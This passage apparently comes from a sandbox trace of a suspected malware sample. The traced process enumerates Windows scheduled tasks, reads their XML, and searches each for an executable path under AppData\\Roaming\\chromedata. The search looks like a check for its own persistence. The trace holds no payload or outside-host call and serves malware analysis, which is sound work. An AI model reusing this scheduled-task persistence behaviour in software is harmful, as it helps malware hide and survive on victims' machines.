<Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.644] IUnknown:Release (This=0x22c2048) returned 0x0
	[0073.644] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c2048) returned 0x0
	[0073.644] IRegisteredTask:get_Name (in: This=0x22c2048, pName=0x128e3c | out: pName=0x128e3c*="IpAddressConflict2") returned 0x0
	[0073.644] IRegisteredTask:get_Xml (in: This=0x22c2048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict2</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"ef402a22-96ec-4526-a70a-85d0c36c85f6\">\r\n      <StartBoundary>2006-02-23T16:27:43</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4199]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.645] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict2</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"ef402a22-96ec-4526-a70a-85d0c36c85f6\">\r\n      <StartBoundary>2006-02-23T16:27:43</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4199]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.645] IUnknown:Release (This=0x22c2048) returned 0x0
	[0073.645] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.645] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.645] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.645] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.646] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.646] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x24, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.646] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe88) returned 0x0
	[0073.646] IRegisteredTaskCollection:get_Count (in: This=0x55fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.646] IRegisteredTaskCollection:get_Item (in: This=0x55fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff90) returned 0x0
	[0073.646] IRegisteredTask:get_Name (in: This=0x55ff90, pName=0x128e3c | out: pName=0x128e3c*="MsCtfMonitor") returned 0x0
	[0073.646] IRegisteredTask:get_Xml (in: This=0x55ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)</Source>\r\n    <URI>Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor</URI>\r\n    <Description>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <ComHandler>\r\n      <ClassId>{01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.647] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)</Source>\r\n    <URI>Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor</URI>\r\n    <Description>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <ComHandler>\r\n      <ClassId>{01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.647] IUnknown:Release (This=0x55ff90) returned 0x0
	[0073.647] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.647] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe88) returned 0x0
	[0073.647] ITaskFolderCollection:get_Count (in: This=0x55fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.647] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.647] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.647] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x25, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.647] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fee0) returned 0x0
	[0073.648] IRegisteredTaskCollection:get_Count (in: This=0x55fee0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.648] IRegisteredTaskCollection:get_Item (in: This=0x55fee0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c2048) returned 0x0
	[0073.648] IRegisteredTask:get_Name (in: This=0x22c2048, pName=0x128e3c | out: pName=0x128e3c*="SynchronizeTime") returned 0x0
	[0073.648] IRegisteredTask:get_Xml (in: This=0x22c2048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\w32time.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\w32time.dll,-202)</Author>\r\n    <Description>$(@%systemroot%\\system32\\w32time.dll,-201)</Description>\r\n    <URI>Microsoft\\Windows\\Time Synchronization\\SynchronizeTime</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"TimeSyncWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\sc.exe</Command>\r\n      <Arguments>start w32time task_started</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.648] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\w32time.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\w32time.dll,-202)</Author>\r\n    <Description>$(@%systemroot%\\system32\\w32time.dll,-201)</Description>\r\n    <URI>Microsoft\\Windows\\Time Synchronization\\SynchronizeTime</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"TimeSyncWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\sc.exe</Command>\r\n      <Arguments>start w32time task_started</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.648] IUnknown:Release (This=0x22c2048) returned 0x0
	[0073.648] IUnknown:Release (This=0x55fee0) returned 0x0
	[0073.648] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fee0) returned 0x0
	[0073.649] ITaskFolderCollection:get_Count (in: This=0x55fee0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.649] IUnknown:Release (This=0x55fee0) returned 0x0
	[0073.649] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.649] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x26, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.649] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec0) returned 0x0
	[0073.649] IRegisteredTaskCollection:get_Count (in: This=0x55fec0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.649] IRegisteredTaskCollection:get_Item (in: This=0x55fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff98) returned 0x0
	[0073.649] IRegisteredTask:get_Name (in: This=0x55ff98, pName=0x128e3c | out: pName=0x128e3c*="UPnPHostConfig") returned 0x0
	[0073.649] IRegisteredTask:get_Xml (in: This=0x55ff98, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\upnphost.dll,-215)</Author>\r\n    <Description>$(@%systemroot%\\system32\\upnphost.dll,-216)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\UPnP\\UPnPHostConfig</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>config upnphost start= auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.650] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\upnphost.dll,-215)</Author>\r\n    <Description>$(@%systemroot%\\system32\\upnphost.dll,-216)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\UPnP\\UPnPHostConfig</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>config upnphost start= auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.650] IUnknown:Release (This=0x55ff98) returned 0x0
	[0073.650] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.650] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec0) returned 0x0
	[0073.650] ITaskFolderCollection:get_Count (in: This=0x55fec0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.650] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.650] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.650] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x27, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.650] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fee0) returned 0x0
	[0073.651] IRegisteredTaskCollection:get_Count (in: This=0x55fee0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.651] IRegisteredTaskCollection:get_Item (in: This=0x55fee0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c2048) returned 0x0
	[0073.651] IRegisteredTask:get_Name (in: This=0x22c2048, pName=0x128e3c | out: pName=0x128e3c*="HiveUploadTask") returned 0x0
	[0073.651] IRegisteredTask:get_Xml (in: This=0x22c2048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\User Profile Service\\HiveUploadTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\profsvc,-500)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\profsvc,-500)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\profsvc,-501)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2007-08-28T00:00:00</StartBoundary>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <Repetition>\r\n        <Interval>PT12H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RestartOnFailure>\r\n      <Interval>PT2M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{BA677074-762C-444b-94C8-8C83F93F6605}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.651] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\User Profile Service\\HiveUploadTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\profsvc,-500)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\profsvc,-500)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\profsvc,-501)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2007-08-28T00:00:00</StartBoundary>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <Repetition>\r\n        <Interval>PT12H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RestartOnFailure>\r\n      <Interval>PT2M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{BA677074-762C-444b-94C8-8C83F93F6605}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.652] IUnknown:Release (This=0x22c2048) returned 0x0
	[0073.652] IUnknown:Release (This=0x55fee0) returned 0x0
	[0073.652] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fee0) returned 0x0
	[0073.652] ITaskFolderCollection:get_Count (in: This=0x55fee0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.652] IUnknown:Release (This=0x55fee0) returned 0x0
	[0073.652] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
